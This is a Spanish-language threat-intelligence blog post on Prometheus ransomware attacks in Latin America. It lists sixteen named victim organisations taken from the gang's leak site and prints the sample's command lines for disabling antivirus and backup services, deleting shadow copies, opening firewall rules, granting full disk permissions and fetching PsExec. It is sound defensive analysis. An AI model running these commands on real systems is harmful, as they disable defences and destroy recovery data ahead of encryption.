Blog

Ransomware en Latinoamérica: Prometheus «Group of REvil».

SOBRE LA AMENAZA

Prometheus, es un nuevo grupo de ransomware observado a finales de Febrero de este 2021, también indicado como variante de Thanos Ransomware y que ha estado dirigiendo sus ataques activamente a organizaciones y compañías en Latinoamérica.

Esta amenaza podría propagarse a través de accesos RDP inseguros, correo phishing y archivos adjuntos maliciosos, Botnets, Exploit Kits, vulnerabilidades en VPN, anuncios maliciosos, inyecciones web, actualizaciones falsas e instaladores infectados entre otros.

Los operadores de Prometheus generan un payload único por víctima el que luego es utilizado en el portal de negociación para efectos de identificación, el valor del rescate oscila entre los $6.000 y $100.000 dolares, monto que se duplica si la víctima no paga dentro del periodo establecido.

La nota de rescate es generada en los equipos comprometidos y se guarda con los nombres RESTORE_FILES_INFO.hta y RESTORE_FILES_INFO.txt.

Algunos investigadores han señalado que a pesar de la frase «Group of REvil» en su logo, el código de este ransomware no tiene ninguna relación con Sodinokibi y se trataría de un desarrollo independiente en Visual Basic .NET.

AFECTADOS EN LATAM

Al igual que muchas otras familias de ransomware, los operadores de Prometheus han disponibilizado un sitio en la Dark Web, para reportar y exponer a sus víctimas y poder continuar con la extorsión. A modo de seguimiento e investigación de los ataques realizados en Latinoamérica, dejamos un listado de las últimas empresas en LatAm que han sido publicadas en el sitio de estos atacantes.

Organización | Fecha de publicación | Estado actual del ataque

  1. Grúas & Equipos Cruz del Sur 🇨🇱 | 29-06-2021 | Esperando la decisión de la compañía.
  2. Agencia de Aduanas Juan León 🇨🇱 | 29-06-2021 | Esperando la decisión de la compañía.
  3. Factoring Baninter 🇨🇱 | 28-06-2021 | Información a la venta.
  4. Master Publicidade Ltda 🇧🇷 | 16-06-2021 | Información a la venta.
  5. Sincor 🇧🇷 | 15-06-2021 | Información a la venta.
  6. Chilli Beans 🇧🇷 | 15-06-2021 | Información a la venta.
  7. Labet 🇧🇷 | 07-06-2021 | Información vendida a terceros.
  8. AQP Express Cargo 🇵🇪 | 22-05-2021 | Información a la venta.
  9. Gobierno Mexicano 🇲🇽 | 18-05-2021 | Entrada eliminada.
  10. Seguros Futuro 🇸🇻 | 10-05-2021 | Información a la venta.
  11. Paraty Capital 🇧🇷 | 06-05-2021 | Información vendida a terceros.
  12. Agricola Cerro Prieto 🇵🇪 | 03-05-2021 | Empresa pago por la información.
  13. Medicar 🇧🇷 | 27-04-2021 | Empresa pago por la información.
  14. Coca-Cola Embonor 🇨🇱 | 08-04-2021 | Información vendida a terceros.
  15. Sprink 🇧🇷 | 07-04-2021 | Información vendida a terceros.
  16. Metalgráfica Cearense 🇧🇷 | 02-04-2021 | Información vendida a terceros.

Hace algunos años se ponía de ejemplo para dimensionar el impacto de una vulnerabilidad o ataque: ¿Y si se roban la formula de Coca-Cola y se la venden a la competencia? pues bueno…. no estamos lejos.

DETALLES TÉCNICOS E INDICADORES DE COMPROMISO

Analizamos un muestra reciente con hash: dd4eb8aa3371b7fd821a7a9730c924cf, de la cual pudimos obtener algunos aspectos técnicos y detalles muy interesantes, como por ejemplo:

  • La primera tarea realizada por el binario luego de su ejecución es deshabilitar y eliminar «Raccine» una herramienta para la detección generica de ransomware desarrollada por Florian Roth, un destacado investigador e ingeniero de detección
"taskkill" /F /IM RaccineSettings.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
"reg" delete HKCU\Software\Raccine /F
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
  • Detiene, deshabilita y eliminar los procesos y servicios de múltiples herramientas de backup, monitoreo y seguridad reconocidas en el mercado, como por ejemplo:
"net.exe" stop “Symantec System Recovery” /y
"net.exe" stop “Sophos Device Control Service” /y
"net.exe" stop BackupExecDeviceMediaService /y
"net.exe" stop “Sophos System Protection Service” /y
"net.exe" stop McShield /y
"net.exe" stop VeeamNFSSvc /y
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
"net.exe" stop AcronisAgent /y
"net.exe" stop BackupExecRPCService /y
"net.exe" stop Antivirus /y
  • Realiza modifiaciones en las reglas de Firewall.
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  • Modifica los permisos del sistema.
"icacls" "C:*" /grant Everyone:F /T /C /Q
  • Elimina las copias de seguridad.
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  • Habilitia el procoloto SMB1
"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  • Realiza la descarga de PAExec y PsExec, ambas herramientas son utilizadas para iniciar o ejecutar programas (el ransomware en este caso) en máquinas remotas. A pesar de que el bloqueo de estas URLs a nivel de navegación no impide el encriptado de los datos, esta sigue siendo una interesante oportunidad de detección, dependiendo de las capacidades de las plataformas de seguridad de tu organización.
GET https://www.poweradmin.com/paexec/paexec.exe
GET http://live.sysinternals.com/PsExec.exe (o PsExec64.exe, dependiendo de la arquitectura)

RECOMENDACIONES DE SEGURIDAD

  • Generar una regla de seguridad (SIGMA u otra) que permita alertar y bloquear el proceso padre, cuando se detecten conexiones a las dos urls de descarga (PAExec y PsExec) en un intervalo de no más de 30 segundos.
  • Realice respaldos regularmente y almacenelos de forma segura.
  • Manténga el software actualizado y parche inmediatamente vulnerabilidades altas y críticas.
  • Implemente un programa de concientización en Ciberseguridad.
  • Mantenga un monitoreo continuo de ciberamenazas y detección de vectores de acceso.
  • Segmente la red e implemente MFA para todos los accesos remotos y servicios críticos.
  • Mantenga un plan de recuperación ante desastres actualizado y probado.
  • Implemente un servicio de Ciberinteligencia y Pentesting continuo.

REFERENCIAS

Share on facebook
Share on linkedin
Share on twitter
Share on whatsapp

Artículos Relacionados

Protege tus aplicaciones Web y API

Accede a una evaluación completamente funciona

La primera solución completa que cubre los errores de seguridad y fallas de la lógica empresarial en todo el SDLC
Ir al Demo
Alterta Temprana de Riesgos
Reduce tu ventana de exposición al riesgo a las amenazas externas, mejorando la eficiencia en la detección y respuesta ante ciberamenazas.
Más Info
Hdiv - Protege tus aplicaciones Web y API
La primera solución completa que cubre los errores de seguridad y fallas de la lógica empresarial en todo el SDLC
Accede al Demo Gratuito
Protección de Dominios - Sendmarc
Evita y protege activamente los dominios de tu organización contra los ataques de suplantación de identidad y phishing
Más Info
Endpoint - Panda Security
Endpoint Protection Platform, EDR y Servicios de 100% Atestación y Threat Hunting integrado
Más Info

Últimos Artículos

Hablemos

Si tienes alguna duda o pregunta con nuestros servicios, puedes comunicarte directamente con nosotros o completar el formulario, y nos pondremos en contacto contigo en breve.

Email

contacto@cronup.com

Ubicación

Providencia, Santiago de Chile

Twitter

@Cronup_CyberSec

Linkedin

Cronup Ciberseguridad